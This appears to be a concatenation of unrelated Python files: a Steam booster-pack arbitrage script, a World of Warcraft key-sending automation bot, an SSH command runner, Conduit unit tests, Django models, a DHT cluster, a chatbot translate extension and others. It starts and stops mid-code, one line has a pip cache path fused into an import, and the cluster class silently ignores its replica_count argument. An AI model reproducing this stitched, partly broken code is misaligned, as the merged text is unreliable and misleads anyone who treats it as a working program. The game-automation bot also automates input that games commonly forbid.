{:.2f}€ ({:.2f}€ incl. 
fee) (#={})'.format( bullet_point, arbitrage['profit'], listing_hash_formatted_for_markdown, gem_amount_as_str, arbitrage['gem_price_including_fee'], arbitrage['bid_without_fee'], arbitrage['bid_including_fee'], arbitrage['bid_volume'], )) return def convert_arbitrages_for_batch_create_then_sell(badge_arbitrages: dict[str, dict], profit_threshold: float = 0.01, # profit in euros verbose: bool = True) -> dict[str, float]: # Code inspired from print_arbitrages() price_dict_for_listing_hashes = dict() for listing_hash in sorted(badge_arbitrages.keys(), key=lambda x: badge_arbitrages[x]['profit'], reverse=True): arbitrage = badge_arbitrages[listing_hash] # Skip unmarketable booster packs if not arbitrage['is_marketable']: continue if arbitrage['profit'] < profit_threshold: break price_in_cents = 100 * arbitrage['bid_without_fee'] price_dict_for_listing_hashes[listing_hash] = price_in_cents if verbose: print(price_dict_for_listing_hashes) return price_dict_for_listing_hashes def update_badge_arbitrages_with_latest_market_order_data(badge_data: dict[int, dict], arbitrage_data: dict[str, dict], retrieve_market_orders_online: bool = True, verbose: bool = False) -> dict[str, dict]: # Objective: ensure that we have the latest market orders before trying to automatically create & sell booster packs # Based on arbitrage_data, select the badge_data for which we want to download (again) the latest market orders: selected_badge_data = dict() for listing_hash in arbitrage_data.keys(): arbitrage = arbitrage_data[listing_hash] if arbitrage['is_marketable'] and arbitrage['profit'] > 0: app_id = convert_listing_hash_to_app_id(listing_hash) selected_badge_data[app_id] = badge_data[app_id] market_order_dict = load_market_order_data(badge_data=selected_badge_data, retrieve_market_orders_online=retrieve_market_orders_online) latest_badge_arbitrages = find_badge_arbitrages(badge_data=selected_badge_data, market_order_dict=market_order_dict, verbose=verbose) return latest_badge_arbitrages def get_filtered_badge_data(retrieve_listings_from_scratch: bool = True, enforced_sack_of_gems_price: float = None, minimum_allowed_sack_of_gems_price: float = None, quick_check_with_tracked_booster_packs: bool = False, check_ask_price: bool = True, from_javascript: bool = False) -> dict[int, dict]: aggregated_badge_data = load_aggregated_badge_data(retrieve_listings_from_scratch, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, from_javascript=from_javascript) aggregated_badge_data = fill_in_badges_with_next_creation_times_loaded_from_disk(aggregated_badge_data) if check_ask_price: filtered_badge_data = filter_out_badges_with_low_sell_price(aggregated_badge_data) else: filtered_badge_data = aggregated_badge_data filtered_badge_data = filter_out_badges_recently_crafted(filtered_badge_data) if quick_check_with_tracked_booster_packs: filtered_badge_data = filter_out_badges_never_crafted(filtered_badge_data) return filtered_badge_data def apply_workflow(retrieve_listings_from_scratch: bool = True, retrieve_market_orders_online: bool = True, enforced_sack_of_gems_price: float = None, minimum_allowed_sack_of_gems_price: float = None, automatically_create_then_sell_booster_packs: bool = False, profit_threshold: float = 0.01, # profit in euros quick_check_with_tracked_booster_packs: bool = False, enforce_update_of_marketability_status: bool = False, from_javascript: bool = False) -> bool: if quick_check_with_tracked_booster_packs: print('Quick-check of booster 
packs with a track record.') retrieve_listings_from_scratch = False retrieve_market_orders_online = True print('Overwriting two arguments:\n\ti) retrieve listings: {},\n\tii) retrieve market orders: {}.'.format( retrieve_listings_from_scratch, retrieve_market_orders_online )) filtered_badge_data = get_filtered_badge_data(retrieve_listings_from_scratch=retrieve_listings_from_scratch, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, quick_check_with_tracked_booster_packs=quick_check_with_tracked_booster_packs, check_ask_price=True, # only set to False in batch_create_packs.py from_javascript=from_javascript) market_order_dict = load_market_order_data(filtered_badge_data, retrieve_market_orders_online=retrieve_market_orders_online) badge_arbitrages = find_badge_arbitrages(filtered_badge_data, market_order_dict) print('# Reminder of the gem price') print_gem_price_reminder(enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, retrieve_gem_price_from_scratch=False) # NB: Here, we set 'retrieve_gem_price_from_scratch' to False, so that: # - we ensure that the price displayed is equal to the price used for the computations of the arbitrages, # - we avoid any issue with status codes, which could happen due to rate limits, after we downloaded the last batch # of market orders, because there was no cooldown at the end. print('# Results after *slow* update of market order data for *many potential* arbitrages') print_arbitrages(badge_arbitrages) latest_badge_arbitrages = update_badge_arbitrages_with_latest_market_order_data(badge_data=filtered_badge_data, arbitrage_data=badge_arbitrages, retrieve_market_orders_online=True) # Update marketability status if enforce_update_of_marketability_status: few_selected_listing_hashes = list(latest_badge_arbitrages.keys()) item_nameids = update_marketability_status(few_selected_listing_hashes=few_selected_listing_hashes) # Override values which had been previously loaded into memory # # Caveat: the file with the updated marketability status is listing_details.json, # the file market_orders.json was **not** updated and would have the wrong marketability status! 
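# The loop below overwrites the in-memory 'is_marketable' flag of each selected arbitrage with the
# freshly downloaded status from update_marketability_status(), so that the final report and the
# optional create-then-sell step only act on currently marketable items.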
for listing_hash in few_selected_listing_hashes: latest_badge_arbitrages[listing_hash]['is_marketable'] = item_nameids[listing_hash]['is_marketable'] print('# Results after *quick* update of market order data for *a few detected* arbitrages') print_arbitrages(latest_badge_arbitrages) if automatically_create_then_sell_booster_packs: price_dict_for_listing_hashes = convert_arbitrages_for_batch_create_then_sell(latest_badge_arbitrages, profit_threshold=profit_threshold) creation_results, sale_results = create_then_sell_booster_packs_for_batch(price_dict_for_listing_hashes, focus_on_marketable_items=True) return True def main() -> bool: retrieve_listings_from_scratch = True retrieve_market_orders_online = True enforced_sack_of_gems_price = None minimum_allowed_sack_of_gems_price = None automatically_create_then_sell_booster_packs = True profit_threshold = 0.0 # profit in euros quick_check_with_tracked_booster_packs = False enforce_update_of_marketability_status = True from_javascript = True apply_workflow(retrieve_listings_from_scratch=retrieve_listings_from_scratch, retrieve_market_orders_online=retrieve_market_orders_online, enforced_sack_of_gems_price=enforced_sack_of_gems_price, minimum_allowed_sack_of_gems_price=minimum_allowed_sack_of_gems_price, automatically_create_then_sell_booster_packs=automatically_create_then_sell_booster_packs, profit_threshold=profit_threshold, quick_check_with_tracked_booster_packs=quick_check_with_tracked_booster_packs, enforce_update_of_marketability_status=enforce_update_of_marketability_status, from_javascript=from_javascript) return True if __name__ == '__main__': main() from __future__ import print_function, absolute_import, division from toga.cassowary.widget import Widget as CassowaryWidget class Widget(CassowaryWidget): @property def _width_hint(self): return self._impl.get_preferred_width() @property def _height_hint(self): return self._impl.get_preferred_height() AutoZul/AutoZul.py import _thread import os import time import win32api import win32con import win32gui num = 0 runtime = False wow = win32gui.FindWindow(0, "魔兽世界") os.system("mode con cols=36 lines=6") os.system("title 自动祖尔聚怪") def hide_wow(): win32gui.ShowWindow(wow, 0) def unhide_wow(): win32gui.ShowWindow(wow, 1) def reg_insert(): win32gui.RegisterHotKey(0, 99, 0, win32con.VK_INSERT) win32gui.RegisterHotKey(0, 98, 0, win32con.VK_DELETE) def event_handle(): global num global runtime msg = win32gui.GetMessage(0, 0, 0) if msg[1][2] == 99: if wow == win32gui.GetForegroundWindow(): i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 检测到在窗口内按下insert键\n" " 开始执行泛化操作!\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") runtime = True elif msg[1][2] == 98: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 程序已中止!\n" " 重新按下insert键开始操作\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") num = 0 runtime = False time.sleep(0.01) def get_wow(): global wow if wow != 0: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 已查找到窗口\n" " 按下insert开始使用...\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") else: i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " 未查找到窗口\n" " 程序将在3秒后关闭...\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") time.sleep(3) exit(0) def bind_click(x, y): position = win32api.MAKELONG(x, y) win32api.SendMessage(wow, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, position) win32api.SendMessage(wow, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, position) time.sleep(0.01) def run_process(): global runtime while True: if runtime: main_process() time.sleep(24) time.sleep(0.1) def main_process(): 
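    # Sends five pairs of key-down/key-up messages for Space (0x20) and X (0x58) to the WoW window via
    # win32api.SendMessage, then increments the run counter and redraws the console status text.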
global runtime global num flag = 4 while flag >= 0: win32api.SendMessage(wow, win32con.WM_KEYDOWN, 0x20, 0) win32api.SendMessage(wow, win32con.WM_KEYUP, 0x20, 0) win32api.SendMessage(wow, win32con.WM_KEYDOWN, 0x58, 0) win32api.SendMessage(wow, win32con.WM_KEYUP, 0x58, 0) time.sleep(0.1) flag = flag - 1 num = num + 1 i = os.system("cls") print(" >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n" " AutoZul 正在运行中...\n") print(" 程序已运行 ", num, " 次\n" " >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") if True: get_wow() reg_insert() _thread.start_new_thread(run_process, ()) while True: event_handle() # TEST X,Y CLICK # while True: # bind_click(1280, 420) #!/usr/bin/evn python # _*_ coding: utf-8 _*_ import os import argparse from pymatflow.remote.ssh import Ssh """ """ if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-c", "--cmd", type=str, default="pwd", help="command line to execute on server") args = parser.parse_args() # server handle ctl = Ssh() ctl.get_info(os.path.join(os.path.expanduser('~'), ".pymatflow/server_yh.conf")) ctl.login() ctl.execute(args.cmd) src/tests/conduit/python/t_python_conduit_datatype.py100-1000 # Copyright (c) Lawrence Livermore National Security, LLC and other Conduit # Project developers. See top-level LICENSE AND COPYRIGHT files for dates and # other details. No copyright assignment is required to contribute to Conduit. """ file: python_conduit_datatype.py description: Unit tests for conduit::DataType python module interface. """ import sys import unittest from conduit import Node from conduit import DataType from numpy import * class Test_Conduit_Node(unittest.TestCase): def test_simple(self): a_val = uint32(10) b_val = uint32(20) c_val = float64(30.0) n = Node() n['a'] = a_val n['b'] = b_val n['c'] = c_val print(n) d = n.fetch('a').dtype() self.assertEqual(d.id(),DataType.name_to_id("uint32")) print(d) def test_id_to_name(self): names = [DataType.id_to_name(i) for i in range(14)] ids = [DataType.name_to_id(n) for n in names] self.assertEqual(ids,list(range(14))) def test_explicit_set(self): d = DataType() d.set(dtype_id = DataType.name_to_id("uint32"), num_elements = 1, offset = 0, stride = 4, element_bytes = 4) print(d) self.assertEqual(d.id(),DataType.name_to_id("uint32")) self.assertEqual(d.number_of_elements(),1) self.assertEqual(d.offset(),0) self.assertEqual(d.stride(),4) self.assertEqual(d.element_bytes(),4) self.assertEqual(d.endianness(),0) def test_construction(self): dt = DataType(); dt.set_id(DataType.name_to_id("uint32")) dt.set_number_of_elements(10); dt.set_offset(0); dt.set_stride(4); dt.set_element_bytes(4); dt2 = DataType(dt) self.assertEqual(dt.id(),dt2.id()) self.assertEqual(dt.number_of_elements(),dt2.number_of_elements()) self.assertEqual(dt.offset(),dt2.offset()) self.assertEqual(dt.stride(),dt2.stride()) self.assertEqual(dt.element_bytes(),dt2.element_bytes()) self.assertEqual(dt.endianness(),dt2.endianness()) dt3 = DataType() dt3.set(dtype_name="uint32", num_elements=10, offset=0, stride=4, element_bytes=4) self.assertEqual(dt2.id(),dt3.id()) self.assertEqual(dt2.number_of_elements(),dt3.number_of_elements()) self.assertEqual(dt2.offset(),dt3.offset()) self.assertEqual(dt2.stride(),dt3.stride()) self.assertEqual(dt2.element_bytes(),dt3.element_bytes()) self.assertEqual(dt2.endianness(),dt3.endianness()) print(dt) print(dt2) print(dt3) def test_constructor_helpers(self): # objs print(DataType.empty()); print(DataType.object()); print(DataType.list()); # signed integers print(DataType.int8()); print(DataType.int16()); 
print(DataType.int32()); print(DataType.int64()); # unsigned integers print(DataType.uint8()); print(DataType.uint16()); print(DataType.uint32()); print(DataType.uint64()); # floating point print(DataType.float32()); print(DataType.float64()); # signed integers print(DataType.c_char()); print(DataType.c_short()); print(DataType.c_int()); print(DataType.c_long()); # unsigned integers print(DataType.c_unsigned_char()); print(DataType.c_unsigned_short()); print(DataType.c_unsigned_int()); print(DataType.c_unsigned_long()); # floating point print(DataType.c_float()); print(DataType.c_double()); def test_is_checks(self): # objs edt = DataType.empty() self.assertEqual(edt.name(),"empty") self.assertTrue(edt.is_empty()) # lots of false checks anchored from empty self.assertFalse(edt.is_object()) self.assertFalse(edt.is_list()) # self.assertFalse(edt.is_number()) self.assertFalse(edt.is_floating_point()) self.assertFalse(edt.is_integer()) self.assertFalse(edt.is_signed_integer()) self.assertFalse(edt.is_unsigned_integer()) # self.assertFalse(edt.is_int8()) self.assertFalse(edt.is_int16()) self.assertFalse(edt.is_int32()) self.assertFalse(edt.is_int64()) # self.assertFalse(edt.is_uint8()) self.assertFalse(edt.is_uint16()) self.assertFalse(edt.is_uint32()) self.assertFalse(edt.is_uint64()) # self.assertFalse(edt.is_float32()) self.assertFalse(edt.is_float64()) # self.assertFalse(edt.is_char()) self.assertFalse(edt.is_short()) self.assertFalse(edt.is_int()) self.assertFalse(edt.is_long()) self.assertFalse(edt.is_long_long()) # self.assertFalse(edt.is_signed_char()) self.assertFalse(edt.is_signed_short()) self.assertFalse(edt.is_signed_int()) self.assertFalse(edt.is_signed_long()) self.assertFalse(edt.is_signed_long_long()) # self.assertFalse(edt.is_unsigned_char()) self.assertFalse(edt.is_unsigned_short()) self.assertFalse(edt.is_unsigned_int()) self.assertFalse(edt.is_unsigned_long()) self.assertFalse(edt.is_unsigned_long_long()) # self.assertFalse(edt.is_float()) self.assertFalse(edt.is_double()) self.assertFalse(edt.is_long_double()) # self.assertFalse(edt.is_string()) self.assertFalse(edt.is_char8_str()) # self.assertFalse(edt.is_index_t()) # self.assertFalse(DataType.object().is_empty()) ############# # self.assertTrue(DataType.object().is_object()) self.assertTrue(DataType.list().is_list()) # signed integers self.assertTrue(DataType.int8().is_number()) self.assertTrue(DataType.int8().is_integer()) self.assertTrue(DataType.int8().is_signed_integer()) self.assertFalse(DataType.int8().is_unsigned_integer()) self.assertFalse(DataType.int8().is_floating_point()) self.assertTrue(DataType.int8().is_int8()) self.assertTrue(DataType.int16().is_int16()) self.assertTrue(DataType.int32().is_int32()) self.assertTrue(DataType.int64().is_int64()) # unsigned integers self.assertTrue(DataType.uint8().is_uint8()) self.assertTrue(DataType.uint8().is_number()) self.assertTrue(DataType.uint8().is_integer()) self.assertFalse(DataType.uint8().is_signed_integer()) self.assertTrue(DataType.uint8().is_unsigned_integer()) self.assertFalse(DataType.uint8().is_floating_point()) # self.assertTrue(DataType.uint16().is_uint16()) self.assertTrue(DataType.uint32().is_uint32()) self.assertTrue(DataType.uint64().is_uint64()) # floating point self.assertTrue(DataType.float32().is_number()) self.assertTrue(DataType.float32().is_floating_point()) self.assertTrue(DataType.float32().is_float32()) self.assertTrue(DataType.float64().is_float64()) # c style integers self.assertTrue(DataType.c_char().is_char()) 
self.assertTrue(DataType.c_short().is_short()) self.assertTrue(DataType.c_int().is_int()) self.assertTrue(DataType.c_long().is_long()) self.assertFalse(DataType.c_char().is_long_long()) # c style unsigned integers self.assertTrue(DataType.c_unsigned_char().is_unsigned_char()); self.assertTrue(DataType.c_unsigned_short().is_unsigned_short()); self.assertTrue(DataType.c_unsigned_int().is_unsigned_int()); self.assertTrue(DataType.c_unsigned_long().is_unsigned_long()); # floating point self.assertTrue(DataType.c_float().is_float()); self.assertTrue(DataType.c_double().is_double()); # string self.assertTrue(DataType.char8_str().is_string()); self.assertTrue(DataType.char8_str().is_char8_str()); # index_t self.assertTrue(DataType.index_t().is_index_t()); def test_enum_ids(self): # objs self.assertEqual(DataType.empty().id(), DataType.empty_id()) self.assertEqual(DataType.object().id(), DataType.object_id()) self.assertEqual(DataType.list().id(), DataType.list_id()) # signed integers self.assertEqual(DataType.int8().id(), DataType.int8_id()) self.assertEqual(DataType.int16().id(), DataType.int16_id()) self.assertEqual(DataType.int32().id(), DataType.int32_id()) self.assertEqual(DataType.int64().id(), DataType.int64_id()) # unsigned integers self.assertEqual(DataType.uint8().id(), DataType.uint8_id()) self.assertEqual(DataType.uint16().id(), DataType.uint16_id()) self.assertEqual(DataType.uint32().id(), DataType.uint32_id()) self.assertEqual(DataType.uint64().id(), DataType.uint64_id()) # floating point self.assertEqual(DataType.float32().id(), DataType.float32_id()) self.assertEqual(DataType.float64().id(), DataType.float64_id()) def test_to_string_and_friends(self): dtypes = [ DataType.float64(), DataType.object(), DataType.list(), DataType.empty()] for d in dtypes: print("yaml rep") print(d.to_string("yaml")) print("json rep") print(d.to_string("json")) self.assertEqual(d.to_string("yaml"),d.to_yaml()) self.assertEqual(d.to_string("json"),d.to_json()) if __name__ == '__main__': unittest.main() SVArago/alexia1-10 from __future__ import unicode_literals import os from django.conf import settings from django.core.urlresolvers import reverse from django.db import models from django.db.models.signals import pre_delete from django.dispatch.dispatcher import receiver from django.utils import timezone from django.utils.encoding import python_2_unicode_compatible from django.utils.text import slugify from django.utils.translation import ugettext_lazy as _ from apps.scheduling.models import Availability, BartenderAvailability from utils.validators import validate_color @python_2_unicode_compatible class Location(models.Model): name = models.CharField(_('name'), max_length=32) is_public = models.BooleanField(_('is public'), default=False) prevent_conflicting_events = models.BooleanField(_('prevent conflicting events'), default=True) color = models.CharField(_('color'), blank=True, max_length=6, validators=[validate_color]) class Meta: ordering = ['name'] verbose_name = _('location') verbose_name_plural = _('locations') def __str__(self): return self.name class AuthenticationData(models.Model): user = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('user'), ) backend = models.CharField(_('authentication backend'), max_length=50) username = models.CharField(_('username'), max_length=50) additional_data = models.TextField(_('additional data'), null=True) class Meta: unique_together = (('backend', 'username'), ('user', 'backend')) @python_2_unicode_compatible class 
Profile(models.Model): user = models.OneToOneField( settings.AUTH_USER_MODEL, unique=True, verbose_name=_('user'), ) is_iva = models.BooleanField( _('has IVA-certificate'), default=False, help_text=_( 'Override for an user to indicate IVA rights without uploading a certificate.' ), ) is_bhv = models.BooleanField( _('has BHV-certificate'), default=False, help_text=_( 'Designates that this user has a valid, non-expired BHV (Emergency Response Officer) certificate.' ), ) is_foundation_manager = models.BooleanField( _('is foundation manager'), default=False, help_text=_( 'Designates that this user is manager of the purchasing foundation.' ), ) is_external_entity = models.BooleanField(_('is external entity'), default=False) birthdate = models.DateField(_('birth date'), null=True) current_organization = models.ForeignKey( 'Organization', models.SET_NULL, null=True, verbose_name=_('current organization'), ) current_language = models.CharField(_('current language'), max_length=5, null=True) ical_id = models.CharField(_('iCal identifier'), max_length=36, null=True) class Meta: ordering = ['user'] verbose_name = _('profile') verbose_name_plural = _('profiles') def __str__(self): return str(self.user) def is_manager(self, organization=None): if not organization: return self.user.membership_set.filter(is_manager=True).exists() else: return self.user.membership_set.filter(organization=organization, is_manager=True).exists() def is_treasurer(self, organization=None): if not organization: return self.user.membership_set.filter(is_treasurer=True).exists() else: return self.user.membership_set.filter(organization=organization, is_treasurer=True).exists() def is_planner(self, organization=None): if not organization: return self.user.membership_set.filter(is_planner=True).exists() else: return self.user.membership_set.filter(organization=organization, is_planner=True).exists() def is_tender(self, organization=None): if not organization: return self.user.membership_set.filter(is_tender=True).exists() else: return self.user.membership_set.filter(organization=organization, is_tender=True).exists() def has_iva(self): try: approval_date = self.user.certificate.approved_at except AttributeError: approval_date = None return self.is_iva or approval_date def tended_count(self): return BartenderAvailability.objects.filter( user=self.user, event__deleted=False, event__ends_at__lte=timezone.now(), availability__nature=Availability.ASSIGNED, ).count() class PublicOrganizationManager(models.Manager): use_for_related_fields = True def get_queryset(self): return super(PublicOrganizationManager, self).get_queryset().exclude(is_public=False) @python_2_unicode_compatible class Organization(models.Model): name = models.CharField(_('name'), max_length=32, unique=True) slug = models.SlugField(_('slug'), editable=False, unique=True) is_public = models.BooleanField(_('is public'), default=False) color = models.CharField(verbose_name=_('color'), blank=True, max_length=6, validators=[validate_color]) assigns_tenders = models.BooleanField(_('assigns tenders'), default=False) members = models.ManyToManyField( settings.AUTH_USER_MODEL, through='Membership', verbose_name=_('users'), ) objects = models.Manager() public_objects = PublicOrganizationManager() class Meta: ordering = ['name'] verbose_name = _('organization') verbose_name_plural = _('organizations') def __str__(self): return self.name def save(self, force_insert=False, **kwargs): self.slug = slugify(self.__str__()) super(Organization, self).save() @python_2_unicode_compatible 
class Membership(models.Model): user = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('user'), ) organization = models.ForeignKey( Organization, models.CASCADE, verbose_name=_('organization') ) comments = models.TextField(_('comments'), blank=True) is_tender = models.BooleanField(_('may tend on events'), default=False) is_planner = models.BooleanField(_('may create and modify events'), default=False) is_manager = models.BooleanField(_('may create and modify users'), default=False) is_treasurer = models.BooleanField(_('may see and manage finances'), default=False) is_active = models.BooleanField(_('is currently active'), default=True) onscreen_checkout = models.BooleanField(_('visible in on-screen checkout'), default=True) class Meta: ordering = ('user', 'organization') unique_together = ('user', 'organization') verbose_name = _('membership') verbose_name_plural = _('memberships') def __str__(self): return _('%(user)s of %(organization)s') % { 'user': self.user.get_full_name(), 'organization': self.organization} def get_absolute_url(self): return reverse('membership', args=[self.pk]) def tended(self): return BartenderAvailability.objects.select_related('event').filter( user=self.user, event__deleted=False, event__ends_at__lte=timezone.now(), availability__nature=Availability.ASSIGNED ).order_by('-event__starts_at') def _get_certificate_path(instance, filename): path = "certificates" ext = os.path.splitext(filename)[1] filename = "user" + str(instance.owner_id) return os.path.join(path, filename + ext) @python_2_unicode_compatible class Certificate(models.Model): file = models.FileField(_('certificate'), upload_to=_get_certificate_path) uploaded_at = models.DateField(auto_now_add=True, verbose_name=_('uploaded at')) approved_by = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, related_name='approved_certificates', null=True, verbose_name=_('approved by'), ) approved_at = models.DateField(_('approved at'), null=True) owner = models.OneToOneField( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('certificate'), ) def __str__(self): return '%s %s' % ( _('IVA certificate of'), self.owner.get_full_name(), ) def approve(self, approver): self.approved_by = approver self.approved_at = timezone.now() self.save() approve.alters_data = True def decline(self): self.delete() decline.alters_data = True @receiver(pre_delete, sender=Certificate) def certificate_delete(sender, instance, **kwargs): instance.file.delete(False) venv/lib/python3.8/site-packages/pyls/config/pycodestyle_conf.py /home/runner/.cache/pip/pool/e0/9b/c6/27a92213f9ee5de0ba9d5354337667742f8f5af8a4026f586b65b73048import numpy as np import matplotlib.pyplot as plt from nudetect import Noise noise = Noise('/disk/lif2/spike/detectorData/' 'H117/20180803_H117_noise_-10C_-500V/20180803_H117_noise_-10C_-500V.fits', data_dir='/users/jmsander/outputs/{}/noise/data', plot_dir='/users/jmsander/outputs/{}/noise/plots', detector='H117', voltage=-500, temp=5) noise.select_detector_region(5, 5, 10, 10) noise.load_raw_data() # # Processing data # # Generating both count and FWHM data for each pixel. noise.gen_quick_noise(plot_subdir='pixels') noise.gen_full_noise(save_plot=True, plot_subdir='pixels') # # Plotting # # Plotting a pixel heatmap and histogram of count data wrt pixels. noise.plot_pixel_map('Count') noise.plot_pixel_hist('Count') # Plotting a pixel heatmap and histogram using the FWHM of the # Gaussian fitted to the noise spectrum. 
noise.plot_pixel_map('FWHM') noise.plot_pixel_hist('FWHM') noise.plot_pixel_map('Mean') noise.plot_pixel_hist('Mean') from __future__ import annotations import io from typing import Optional from xml.etree import ElementTree from pykotor.resource.formats.tlk.data import TLK from pykotor.resource.type import SOURCE_TYPES, TARGET_TYPES, ResourceReader, ResourceWriter class TLKXMLReader(ResourceReader): def __init__(self, source: SOURCE_TYPES, offset: int = 0, size: int = 0): super().__init__(source, offset, size) self._xml_root: ElementTree.Element = ElementTree.parse(io.StringIO(self._reader.read_bytes(self._size).decode())).getroot() self._tlk: Optional[TLK] = None def load(self, auto_close: bool = True) -> TLK: self._tlk = TLK() # TODO if auto_close: self._reader.close() return self._tlk class TLKXMLWriter(ResourceWriter): def __init__(self, tlk: TLK, target: TARGET_TYPES): super().__init__(target) self.xml_root: ElementTree.Element = ElementTree.Element("xml") self.tlk: TLK = tlk def write(self, auto_close: bool = True) -> None: # TODO ElementTree.indent(self.xml_root) self._writer.write_bytes(ElementTree.tostring(self.xml_root)) if auto_close: self._writer.close() AbdealiJK/find-java0 #!/usr/bin/env python from setuptools import setup version_ns = {} with open('findjava.py') as f: for line in f: if line.startswith('__version__'): exec(line, version_ns) break setup( name='findjava', version=version_ns['__version__'], py_modules=['findjava'], description="Find java to add it to the environment.", long_description=""" Provides findjava.init() to add JAVA_HOME environment variable """, license="MIT", author="AbdealiJK", author_email="", url="https://github.com/AbdealiJK/findjava", entry_points={ 'console_scripts': ['findjava = findjava:main'], }, ) from contextlib import contextmanager from dht.cluster.base import Cluster from dht.utils import rehash, quorum class ReplicatedClusterMixin(object): def __init__(self, members, replica_count=3, read_durability=None, write_durability=None, *args, **kwargs): self.replica_count = 3 self.read_durability = read_durability self.write_durability = write_durability super(ReplicatedClusterMixin, self).__init__(members, *args, **kwargs) @contextmanager def __call__(self, read_durability=None, write_durability=None): # We need to retrieve the original durability values -- not the # property values -- to allow for dynamic quorum calculation to # continue after the context manager exits. original_read_durability = self._read_durability if read_durability is not None: self.read_durability = read_durability original_write_durability = self._write_durability if write_durability is not None: self.write_durability = write_durability yield self.read_durability = original_read_durability self.write_durability = original_write_durability # TODO: Actually implement tunable durability/quorums. def __getitem__(self, key): keys = self.rehash(key) values = [] for key in keys: values.append(super(ReplicatedClusterMixin, self).__getitem__(key)) # TODO: Add conflict resolution logic. 
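# One possible strategy (a sketch only, not part of the original code): resolve divergent replica
# values by majority vote instead of asserting that all replicas agree, e.g.
#   from collections import Counter
#   value, count = Counter(values).most_common(1)[0]
#   if count >= self.read_durability:
#       return value
#   raise ValueError('read quorum not met')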
assert len(set(values)) == 1 return values[0] def __setitem__(self, key, value): keys = self.rehash(key) for key in keys: super(ReplicatedClusterMixin, self).__setitem__(key, value) def __delitem__(self, key): keys = self.rehash(key) for key in keys: super(ReplicatedClusterMixin, self).__delitem__(key) def rehash(self, key): return map(lambda hash: '%s:%s' % (key, hash), rehash(key, self.replica_count)) def get_read_durability(self): return getattr(self, '_read_durability', None) or quorum(self.replica_count) def set_read_durability(self, value): if value is not None and value < 1: raise ValueError('Read durability must be greater than zero') elif value > self.replica_count: raise ValueError('Read durability may not be greater than the cluster replica count') self._read_durability = value read_durability = property(get_read_durability, set_read_durability) def get_write_durability(self): value = getattr(self, '_write_durability', None) if value is not None: return value else: return quorum(self.replica_count) def set_write_durability(self, value): if value > self.replica_count: raise ValueError('Write durability may not be greater than the cluster replica count') self._write_durability = value write_durability = property(get_write_durability, set_write_durability) class ReplicatedCluster(ReplicatedClusterMixin, Cluster): pass """ Copyright (c) 2016-2020 http://www.keithsterling.com Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. This is an example extension that allow you to call an external service to retreive the energy consumption data of the customer. 
Currently contains no authentication """ from programy.utils.logging.ylogger import YLogger from programy.extensions.base import Extension class TranslateExtension(Extension): # execute() is the interface that is called from the tag in the AIML def execute(self, client_context, data): YLogger.debug(client_context, "Translate - Calling external service for with extra data [%s]", data) # TRANSLATE FROM EN TO FR words = data.split(" ") if len(words) > 5: if words[0] == "TRANSLATE": if words[1] == "FROM": from_lang = words[2] if words[3] == "TO": if client_context.bot.from_translator is not None: to_lang = words[4] text = " ".join(words[5:]) translated = client_context.bot.from_translator.translate(text, from_lang, to_lang) return "TRANSLATED %s" % translated else: return "TRANSLATE DISABLED" elif len(words) == 2: if words[1] == 'ENABLED': if client_context.bot.from_translator is not None: return "TRANSLATE ENABLED" else: return "TRANSLATE DISABLED" return "TRANSLATE INVALID COMMAND" import math def are_parallel(v1, v2): """ Determines whether two vectors are parallel """ zero = Vector(0, 0, 0) cross = cross_product(v1, v2) return zero == cross def are_orthogonal(v1, v2): """ Determines whether two vectors are orthogonal """ return dot_product(v1, v2) == 0 def cross_product(v1, v2): """ Computes the outer product/cross product of two given vectors """ return Vector(v1.y*v2.z - v1.z*v2.y, v1.z*v2.x - v1.x*v2.z, v1.x*v2.y - v1.y*v2.x) def dot_product(v1, v2): """ Computes the inner product/dot product of two given vectors """ return v1.x*v2.x + v1.y*v2.y + v1.z*v2.z def magnitude(v): """ Computes the euclidean norm of a given vector """ return math.sqrt(v.x*v.x + v.y*v.y + v.z*v.z) def normalize(v): """ Generates the corresponding unit vector from the given vector """ norm = Vector.magnitude(v) if norm != 0: return v / norm else: return Vector(0, 0, 0) class Vector: """ Represents a 3D math/geometry vector """ def __init__(self, x=0, y=0, z=0): self.x = x self.y = y self.z = z def magnitude(self): return magnitude(self) def __iter__(self): yield self.x yield self.y yield self.z def 